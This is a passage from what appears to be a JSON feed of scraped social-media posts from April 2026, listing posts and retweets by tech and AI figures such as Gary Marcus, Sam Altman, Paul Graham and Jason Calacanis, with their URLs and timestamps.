"https://nitter.net/SteveStricklan6/status/2048589239915577837#m", + "published_at": "2026-04-27T02:25:10+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: the beauty of a jagged frontier\nis that every failure is the user's fault\nand every breakthrough is the model's glory", + "url": "https://nitter.net/suchenzang/status/2048582672163995766#m", + "published_at": "2026-04-27T01:59:04+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Incredible writing from @euphoriaHBO", + "url": "https://nitter.net/Jason/status/2048580651985604783#m", + "published_at": "2026-04-27T01:51:02+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment something goes wrong it's your fault because you didn't understand the tool?", + "url": "https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m", + "published_at": "2026-04-27T01:48:56+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.", + "url": "https://nitter.net/FrankRundatz/status/2048579079121555764#m", + "published_at": "2026-04-27T01:44:47+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "the difference is that we don’t *hype* giving 12 year-olds bulldozers.\n\n*of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point.\n\nvibe coding without considerable experience is like driving without a license.", + "url": "https://nitter.net/GaryMarcus/status/2048578055283880296#m", + "published_at": "2026-04-27T01:40:43+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: Never ever use generative AI for anything critical. \n\nThe technology is probablistic all the way down and therefore inherently unreliable. \n\nWhy is this so hard to understand? \n\nIt’s wild how many seemingly smart people have drunk the cool aid on this.", + "url": "https://nitter.net/SteveStricklan6/status/2048570082843082905#m", + "published_at": "2026-04-27T01:09:02+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Generative AI as the Hindenberg", + "url": "https://nitter.net/GaryMarcus/status/2048567837221089669#m", + "published_at": "2026-04-27T01:00:07+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Is it me or X starting to look like a vibe coded mess?\n\nPolls are broken.\n\nAccounts are getting hacked.\n\nMy DMs are full of phishing scams.\n\nBasics that used to work no longer work.", + "url": "https://nitter.net/GaryMarcus/status/2048558998325166498#m", + "published_at": "2026-04-27T00:25:00+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", + "url": "https://nitter.net/sama/status/2048554097985593849#m", + "published_at": "2026-04-27T00:05:31+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:", + "url": "https://nitter.net/GaryMarcus/status/2048553390540734479#m", + "published_at": "2026-04-27T00:02:43+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Total AI disaster, totally predictable", + "url": "https://nitter.net/GaryMarcus/status/2048552931923013916#m", + "published_at": "2026-04-27T00:00:53+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", + "url": "https://nitter.net/sama/status/2048552677433643427#m", + "published_at": "2026-04-26T23:59:53+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Coders and software engineers ONLY:", + "url": "https://nitter.net/GaryMarcus/status/2048544989769257024#m", + "published_at": "2026-04-26T23:29:20+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", + "url": "https://nitter.net/HarryStebbings/status/2048531257399664920#m", + "published_at": "2026-04-26T22:34:46+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://nitter.net/DavidSacks/status/2048502978626113625#m", + "published_at": "2026-04-26T20:42:24+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "getting so much phishing email in my X DMs. \n\neither a lot of accounts have been hacked or someone has discovered a back door to posting DMs.", + "url": "https://nitter.net/GaryMarcus/status/2048500820350750905#m", + "published_at": "2026-04-26T20:33:49+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’ve invested in 700 private companies \n\nProviding liquidity and loans to high performing founders is completely standard. \n\nIn fact, investors encourage loans and secondary sales for founders to enable them to go for the Gold — which is exactly what SpaceX has done. \n\nThe @NYTimesPR is presenting this as a controversy, when in fact it’s the private company playbook in 2026. \n\nAnother hit job from the NYT", + "url": "https://nitter.net/Jason/status/2048487905543237675#m", + "published_at": "2026-04-26T19:42:30+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers like this. \n\nEpisode tomorrow 👇", + "url": "https://nitter.net/HarryStebbings/status/2048486182904852537#m", + "published_at": "2026-04-26T19:35:39+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP administration in the last 3 decades. Without fail.", + "url": "https://nitter.net/briantylercohen/status/2048469956627468510#m", + "published_at": "2026-04-26T18:31:11+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Ok @Acosta, balls in your court", + "url": "https://nitter.net/Jason/status/2048465651723882972#m", + "published_at": "2026-04-26T18:14:04+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare.\n\nDisgraziad", + "url": "https://nitter.net/Jason/status/2048463405590225173#m", + "published_at": "2026-04-26T18:05:09+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://nitter.net/elonmusk/status/2048456433981591867#m", + "published_at": "2026-04-26T17:37:26+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The only people who believe any of this are non-coders.\n\nI tried to build a game (an area I’m an n00b in.) The results are amusingly disastrous - I never before coded a decent game.\n\nBut I’ll crack out backend services w AI rapidly - because I coded dozens of them before…", + "url": "https://nitter.net/GergelyOrosz/status/2048454331645481034#m", + "published_at": "2026-04-26T17:29:05+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency that distributes $9 billion in research grants every year. \n\nIts members are scientists and engineers from universities and industry. They serve six-year staggered terms specifically so they cross presidential administrations and stay independent of whoever is in power.\n\nOn Friday, every single one of them got the same boilerplate email from Mary Sprowls of the Presidential Personnel Office: \"On behalf of President Donald J Trump, I am writing to inform you that your position as a member of the National Science Board is terminated, effective immediately. Thank you for your service.\"\n\nThat's it. That's the whole letter. For 76 years of institutional independence.\n\nThe NSF funds the basic science behind MRIs. Cellphones. LASIK eye surgery. GPS. The internet itself. The Antarctic research stations. The deep-space telescopes. The research vessels mapping the ocean floor. Every breakthrough that made America the world's leader in science for the better part of a century traces back through grants this agency made and this board approved.\n\nThe board chair, Victor McCrary, was actively advising Congress on Trump's proposed 55% cut to NSF's budget. The board was helping fight back. So Trump fired the board.\n\nMarvi Matos Rodriguez, one of the fired members, told reporters she had been reviewing an 80-page report as part of her board duties just days before being terminated. \n\nKeivan Stassun, a physicist at Vanderbilt, said NSF's leadership had already stopped responding to board oversight requests months ago. \"We would ask them, 'Are you following board governance directives?' And their answer would be, in effect, 'We don't listen to you anymore.'\"\n\nNow there's no board to answer to.\n\nRep. Zoe Lofgren of California, the top Democrat on the House Science Committee, called it \"the latest stupid move made by a president who continues to harm science and American innovation. Will the president fill the NSB with MAGA loyalists who won't stand up to him as he hands over our leadership in science to our adversaries?\"\n\nThat's the actual question. \n\nBecause while Trump is firing American scientists, China is building research universities at a rate we cannot match. The CDC just buried a study showing vaccines work.\n\n RFK Jr. runs HHS. The EPA is gutted. The Forest Service is being broken. Half of American children are breathing dangerous air. And now the people who decide what gets researched in the United States have all been fired by email on a Friday afternoon.", + "url": "https://nitter.net/Gianl1974/status/2048453901930660058#m", + "published_at": "2026-04-26T17:27:23+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Who made this?!", + "url": "https://nitter.net/Jason/status/2048450286902235560#m", + "published_at": "2026-04-26T17:13:01+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th \n\n$100,000 cash prize \n\nVegas \n\n3, 3 minute rounds", + "url": "https://nitter.net/Jason/status/2048437340218044499#m", + "published_at": "2026-04-26T16:21:34+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers", + "url": "https://nitter.net/Jason/status/2048436081725464959#m", + "published_at": "2026-04-26T16:16:34+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\nImagine if a mainstream politician put the Heaven's Gate suicide cult on the platform in 1997?\n\nThat's where we are in American politics at the edges today. \n\nWe've jumped the shark into the absurd and we've completely lost the thread of reality in America today.\n\nAnd it isn't AI that caused this madness. It is good old fashioned human hallucination, story telling and delusion.\n\nSociety should never make policy about imaginary future threats that have no actual basis in reality. AI is already used by billions and it is nothing like what people imagined it to be and we're all still here and the problems have been ridiculously minimal even by the standards of past tech revolutions.\n\nIf I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? The answer is yes because it's cars. You probably got in one today and accepted that risk and never even thought about it.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. It's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nIf the pause AI cult had their way we'd still be stuck on GPT2 which was a hallucinating mess and we'd have made no progress to the much more sound and highly aligned and intelligent and useful models we have now.\n\nThat's because you can't make progress by imagining it in your mind or writing idiotic essays on Less Wrong to other mental masturbators. \n\nYou solve problems in the real world through trial and error. \n\nThe way to make AI safe is by building it and iterating in the real world. \n\nThere is no other way.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m", + "published_at": "2026-04-26T16:03:04+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", + "url": "https://nitter.net/sama/status/2048428561481265539#m", + "published_at": "2026-04-26T15:46:41+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", + "url": "https://nitter.net/sama/status/2048426122854228141#m", + "published_at": "2026-04-26T15:37:00+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do not want to commit 10 years to such uncertainty. \n\nPack is separating.", + "url": "https://nitter.net/HarryStebbings/status/2048418806867870115#m", + "published_at": "2026-04-26T15:07:55+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://nitter.net/AndrewKolvet/status/2048417712439689346#m", + "published_at": "2026-04-26T15:03:35+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", + "url": "https://nitter.net/DennisonBertram/status/2048413815675539816#m", + "published_at": "2026-04-26T14:48:06+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", + "url": "https://nitter.net/paulg/status/2048413578789634100#m", + "published_at": "2026-04-26T14:47:09+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Durer was the original Dr Seuss.", + "url": "https://nitter.net/paulg/status/2048411898081583547#m", + "published_at": "2026-04-26T14:40:28+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", + "url": "https://nitter.net/paulg/status/2048411021329453562#m", + "published_at": "2026-04-26T14:36:59+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages.", + "url": "https://nitter.net/HarryStebbings/status/2048400836024283246#m", + "published_at": "2026-04-26T13:56:31+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Random pic of @Jason protecting our $TAO bags", + "url": "https://nitter.net/nordin_eth/status/2048399674269213067#m", + "published_at": "2026-04-26T13:51:54+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", + "url": "https://nitter.net/ylecun/status/2048399621492236615#m", + "published_at": "2026-04-26T13:51:41+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", + "url": "https://nitter.net/haaretzcom/status/2048396013816152216#m", + "published_at": "2026-04-26T13:37:21+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Good use of camouflage by Biscuit.", + "url": "https://nitter.net/paulg/status/2048370801833828507#m", + "published_at": "2026-04-26T11:57:10+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://nitter.net/TrackGazette/status/2048351736037826877#m", + "published_at": "2026-04-26T10:41:25+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put away childish things.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m", + "published_at": "2026-04-26T06:48:29+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The left has a serious violence problem, which @DavidSacks called out early and often. \n\nThis generation of woke democratic socialists are morally bankrupt. \n\nThey believe in looting and violence as a political tool — and they’re vocal about it. \n\nIf you called out the violent members of the January 6th riots, you also have to call out the radical left. \n\n#ballsandstrikes https://x.com/EndWokeness/status/2048217117221065201/video/1", + "url": "https://nitter.net/Jason/status/2048249992163242220#m", + "published_at": "2026-04-26T03:57:07+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "If you’re not condemning these lunatics, you’re advocating for the end of the American empire. \n\nI’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individuals, but selects them to represent their brands, shows exactly how bankrupt they are.", + "url": "https://nitter.net/Jason/status/2048247267182658004#m", + "published_at": "2026-04-26T03:46:17+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Heroes 🫡", + "url": "https://nitter.net/Jason/status/2048245718171648271#m", + "published_at": "2026-04-26T03:40:08+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Saturday song\n\nhttps://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0", + "url": "https://nitter.net/eladgil/status/2048230781739581745#m", + "published_at": "2026-04-26T02:40:47+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day", + "url": "https://nitter.net/SebastienBubeck/status/2048224374264885396#m", + "published_at": "2026-04-26T02:15:19+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "how can they write code so fast?!", + "url": "https://nitter.net/sama/status/2048165186482389253#m", + "published_at": "2026-04-25T22:20:08+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: (and we will fix the former)", + "url": "https://nitter.net/sama/status/2048160448340767038#m", + "published_at": "2026-04-25T22:01:18+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we still get looksmaxxed on frontend a little but we IQmog hard now", + "url": "https://nitter.net/sama/status/2048160404376105179#m", + "published_at": "2026-04-25T22:01:08+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "x.com/i/spaces/1nGeLyjZrkvKX", + "url": "https://nitter.net/Jason/status/2048151434928017429#m", + "published_at": "2026-04-25T21:25:29+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5TJjQ", + "url": "https://nitter.net/PhillyInquirer/status/2048118689258487857#m", + "published_at": "2026-04-25T19:15:22+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "nightmare blunt rotation", + "url": "https://nitter.net/Jason/status/2048116521436590260#m", + "published_at": "2026-04-25T19:06:45+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "today #knicks \n\n@mikal_bridges to 6th man/leads the bench in scoring \n\nKnicks play @23savage____ 26 minutes, he has 5 offensive boards \n\nWe're up 20+ points in the second half \n\n@ATLHawks backs broken; they realize we've figured it out \n\nseries over \n\n@nyknicks in six", + "url": "https://nitter.net/Jason/status/2048116362766127514#m", + "published_at": "2026-04-25T19:06:07+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://nitter.net/RapidResponse47/status/2048111588930986354#m", + "published_at": "2026-04-25T18:47:09+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for investors is always a good thing. Let a thousand flowers bloom.”\n\nPlus:\n\n💰 Was the NYT wrong to host a discussion about “micro-looting”?\n\n🪖 A Special Forces soldier was insider trading on Polymarket… does it matter who he bet on?\n\n💵 Why rich families teach their kids about finance but public schools don’t.\n\nIt’s a TWiST Saturday special!\n\n0:00 Intro\n1:18 Naval's $500 VC Fund Explained\n5:54 Should You Trust Critics With 2K Followers?\n7:21 Learn By Betting — Jason's Philosophy\n10:10 Northwest Registered Agent - Get more when you start your business with Northwest. In 10 clicks and 10 minutes, you can form your company and walk away with a real business identity — Learn more at https://www.northwestregisteredagent.com/twist\n12:30 The Maduro Polymarket Scandal\n13:28 Should the Military Bet on Missions?\n19:55 LinkedIn Jobs - Hire right, the first time. Post your first job and get $100 off towards your job post at https://LinkedIn.com/twist\n29:32 NYT Defends Theft & \"Social Murder\"\n30:28 There Is No Moral Equivalence\n33:41 The Nepo Baby Behind the Article\n35:42 Prof G's \"Resist & Unsubscribe\" Movement\n37:54 Walk The Walk — Hasan, Bernie & Performative Outrage\n44:49 Teaching Kids About Money\n48:21 The Rich Get Richer & The Poor Stay Poor\n49:31 Outro\n\ncc: @Jason, @Lons, @AngelList, @Naval, @Polymarket, @nytimes\n\n🎥 Watch the full episode here 👇", + "url": "https://nitter.net/twistartups/status/2048099001782985057#m", + "published_at": "2026-04-25T17:57:08+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️\n\nBut over 470,000 pages were already preserved.\n\nThat history didn’t disappear.\nIt was archived.\n\n📚 Read VANISHING CULTURE to see why it matters\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new\n\n#VanishingCulture #DigitalMemory #InternetArchive #MTVNews #BookTwitter", + "url": "https://nitter.net/internetarchive/status/2048069805807128734#m", + "published_at": "2026-04-25T16:01:07+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "5.5 is so earnest\n\n\"little engine that could\" energy", + "url": "https://nitter.net/sama/status/2048062261584077149#m", + "published_at": "2026-04-25T15:31:08+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Another big reason why I don’t necessarily agree with changing the base designs, I think they’re perfect for a medium budget kids cartoon, Qwel’s new art style making them look more marshmallowy and cuddly proves that imo", + "url": "https://nitter.net/images_i_love3/status/2048061157685010444#m", + "published_at": "2026-04-25T15:26:45+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: The future of coding isn't reading lines of code. It's specifying outcomes and getting binaries back.\n\nElon said it. Aravind from Perplexity agrees. And startups are already making it a reality.\n\ncc: @elonmusk, @AravSrinivas, @Jason, @perplexity_ai, @ThisWeeknAI", + "url": "https://nitter.net/twistartups/status/2048057234865693125#m", + "published_at": "2026-04-25T15:11:10+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.", + "url": "https://nitter.net/NickKristof/status/2048043843690561556#m", + "published_at": "2026-04-25T14:17:57+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://nitter.net/BoringBiz_/status/2048037985765949537#m", + "published_at": "2026-04-25T13:54:41+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.", + "url": "https://nitter.net/paulg/status/2048024967996993760#m", + "published_at": "2026-04-25T13:02:57+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. \n\nFounders, particularly first time founders, need to sear this into their brains. Don't mistake one tier for another. Be precise, and always be truthful.", + "url": "https://nitter.net/garrytan/status/2048017824895909901#m", + "published_at": "2026-04-25T12:34:34+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Whoah, self-driving cars compete with airlines. I never considered that till now.", + "url": "https://nitter.net/paulg/status/2048017345000415744#m", + "published_at": "2026-04-25T12:32:40+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like there was some kind of mental block.”-Terence Tao https://www.scientificamerican.com/article/amateur-armed-with-chatgpt-vibe-maths-a-60-year-old-problem/", + "url": "https://nitter.net/Ananyo/status/2047992864118894954#m", + "published_at": "2026-04-25T10:55:23+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: GitHub outages since Microsoft acquisition 🤣", + "url": "https://nitter.net/vaggelisdrak/status/2047957234664030380#m", + "published_at": "2026-04-25T08:33:48+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Hamming's talk is so important that I reproduced it on my site. It's one of the only things on my site written by someone else.\n\nhttps://paulgraham.com/hamming.html", + "url": "https://nitter.net/paulg/status/2047944827887591681#m", + "published_at": "2026-04-25T07:44:30+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the big houses do.", + "url": "https://nitter.net/paulg/status/2047942555254288757#m", + "published_at": "2026-04-25T07:35:28+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you have no idea what's inside watches.", + "url": "https://nitter.net/paulg/status/2047941243234107691#m", + "published_at": "2026-04-25T07:30:15+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://nitter.net/elonmusk/status/2047877294476116184#m", + "published_at": "2026-04-25T03:16:09+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "Steve Jurvetson has a knack for seeing the future more clearly than just about anyone. 